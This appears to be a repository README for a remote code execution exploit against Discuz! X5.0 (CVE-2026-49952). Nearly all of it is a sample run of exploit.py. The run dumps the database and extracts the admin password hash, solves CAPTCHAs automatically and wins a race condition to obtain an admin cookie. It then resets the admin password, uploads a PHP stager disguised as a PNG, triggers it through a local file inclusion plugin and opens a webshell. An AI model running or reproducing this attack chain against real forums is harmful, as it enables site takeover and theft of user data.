passwa11/CVE-2026-49952

# 设置 ``` pip3 install Pillow torch torchvision ``` # 运行 ``` $ python3 exploit.py http://localhost/discuz5/ +----------------------------------------------------+ | Discuz! X5.0 Remote Code Execution Exploit by EgiX | +----------------------------------------------------+ [+] Getting authcode for DB export [+] Authcode: 61feiuI8ReSHRHUDKl2DXeB1QMcdNX6Mpu0gZ8OBS5qRgmQ6Jg3W6mrNVooNqITEtQOd4WUMlGNlQSz7WD6s [+] Exporting DB [+] Downloading DB dump [+] Searching for admin's username and MD5 password hash [+] Admin username: admin [+] Admin MD5 password: 96b21b6bfc5fe6d4530f8345fbcfbc6d [+] Registering new 'special' user [+] Username: 96b21b6bfc5fe6d4530f8345fbcfbc6d 1 c55a895b [+] CAPTCHA is enabled [+] Downloading CAPTCHA [+] CAPTCHA prediction: CY46 [+] Getting authcode for DB import [+] Authcode: 553fh4gPsIhwsSdSKb1ti6SqITi945W2I%2BEyoYCMwVQeMqfyp4ekIwTPqzKkU7hfTHqVg0FhhR9Ic3kiUkkGVsbzkDOIcRpL7bCHUKRKha6KxPeOoud0qxEZPqk [+] CAPTCHA is enabled [+] Downloading CAPTCHA [+] CAPTCHA prediction: CMJ6 [+] Performing race condition attack [+] 🏆 Race condition attack success! [+] Admin authentication cookie: ef196PBDlZZvpe3Fze5ZW36x3%2B7i9cukujemIqJ%2BH1vGJCBmVWLlNVa2OCnq2lAsLjFhrC5x55Wgh3mlqgSnlwXKRqvhQbDaZguSq5hboelr [+] Waiting for the import process to finish [+] Resetting admin password [+] Performing login into admincp [+] As admin: uploading PHP stager as PNG image [+] As admin: importing fake plugin [+] As admin: importing Local File Inclusion (LFI) plugin [+] As admin: triggering PHP stager LFI [+] Launching webshell discuz-shell# id uid=33(www-data) gid=33(www-data) groups=33(www-data) discuz-shell# pwd /var/www/html/discuz5 discuz-shell# exit ```

标签：CISA项目, Discuz!, Python, Web安全, 凭据扫描, 无后门, 条件竞争, 编程工具, 蓝队分析, 远程代码执行, 逆向工具